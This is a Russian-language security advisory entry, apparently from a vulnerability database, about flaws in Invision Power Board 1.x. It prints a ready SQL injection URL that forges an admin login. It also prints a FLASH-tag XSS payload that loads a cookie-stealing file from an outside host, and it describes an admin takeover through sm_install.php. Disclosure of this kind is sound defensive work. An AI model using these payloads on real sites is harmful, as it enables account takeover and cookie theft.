Дата публикации: | 17.07.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 4536 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Invision Power Board 1.x |
Описание: | Несколько уязвимостей в проверке правильности входных данных обнаружено в
Invision Power Board. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.
1. SQl инъекция в 'ipchat.php': http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+sel ect+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f*+ 2. XSS в 'Post.php'. Удаленный пользователь может вставить специально обработанный FLASH тэг внутри HTML кода, чтобы выполнить произвольный HTML код в браузере пользователя, просматривающего это сообщение. Пример: [FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH]2. Также сообщается, что если отсутствует installer-lockfile (install.lock) файл на целеовй системе, то удаленный пользователь может вызвать файл "sm_install.php", чтобы получить привилегии администратора. Уязвимость обнаружена в Invision Power Board 1.1.2 Для устранения уязвимости, установите обновленную версию программы, которую можно скачать отсюда: |
Ссылки: | Invision Power Board v1.1.2 |